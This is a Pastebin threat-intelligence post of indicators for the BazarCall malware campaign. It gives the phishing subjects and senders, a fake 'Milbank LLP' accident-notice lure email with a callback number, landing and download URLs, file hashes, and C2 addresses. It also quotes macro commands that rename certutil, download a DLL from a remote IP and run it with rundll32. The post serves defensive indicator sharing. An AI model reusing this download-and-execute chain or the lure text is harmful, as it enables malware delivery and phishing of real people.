Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THREAT IDENTIFICATION: BAZARCALL
- SUBJECTS OBSERVED
- Notification email of an abandoned road accident site! Need to to get in touch with a manager!
- Notification letter of an abandoned highway accident site! Should to get hold of a supervisor!
- Notification letter of an abandoned highway accident site! Must to get hold of a supervisor!
- SENDERS OBSERVED
- administrator@lupolshop.xyz
- astong1t@gmx.com
- bill@milbank.com
- bill@vm476413.eurodir.ru
- support@powerpresspushup.club
- LURE PHONE NUMBER
- 1 313 217 5223
- EMAIL BODY
- Milbank LLP Insurance company
- Re: Accident on 07/12/2021
- Case Number: L0XXXXXXXXX
- Dear <First> <Last>,
- This mail is to notify you that the vehicle that is documented on your name has left the location of the accident on 07/12/2021.
- In case you would like to see the complete information about the car that has been related to the car accident and images and video material confirming the incident, please remember to get in touch with us from 9 am thru 6 pm ET at:1 313 217 5223. Our agents will give you all the details you may need.
- You must get in touch with us immediately or we will have to submit a report regarding an incident to authorities.
- Regards,
- Milbank LLP Insurance company
- MALDOC LANDING PAGES
- https://milbankllp.net/
- https://milbankllp.net/order
- https://milbankllp.net/case
- MALDOC DOWNLOAD URL
- https://milbankllp.net/download.php
- BAZARCALL MALDOC FILE HASHES
- case_L0XXXXXXXXX.xlsb
- 535f0ae54da4ce0b5b9aedae9a3efa85
- case_L0XXXXXXXXX.xlsb
- 39757aa22acd02291e185ce4c087dad0
- CAPTURED COMMANDS FROM MACROS:
- cmd.exe [580]
- "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\DYdPAHU && copy /b %SystemRoot%\System32\c*tutil.exe c:\programdata\DYdPAHU\DYdPAHU.exe
- cmd.exe [1852]
- "C:\Windows\System32\cmd.exe" /c c:\programdata\DYdPAHU\DYdPAHU.exe -urlcache -f -split http://37.10.71.16 c:\programdata\DYdPAHU\DYdPAHU.dll
- cmd.exe [1540]
- "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\DYdPAHU\DYdPAHU.dll,GlobalOut
- BAZAR PAYLOAD DOWNLOAD URL
- http://37.10.71.16
- BAZAR PAYLOAD FILE HASHES
- (This is certutil just renamed)
- DYdPAHU.exe
- 0d52559aef4aa5eac82f530617032283
- DYdPAHU.dll
- 1b5565aabbcc5a2218d05c816009c7a4
- BAZAR C2
- https://13.52.241.196/req/proc
- https://195.123.233.106/req/proc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement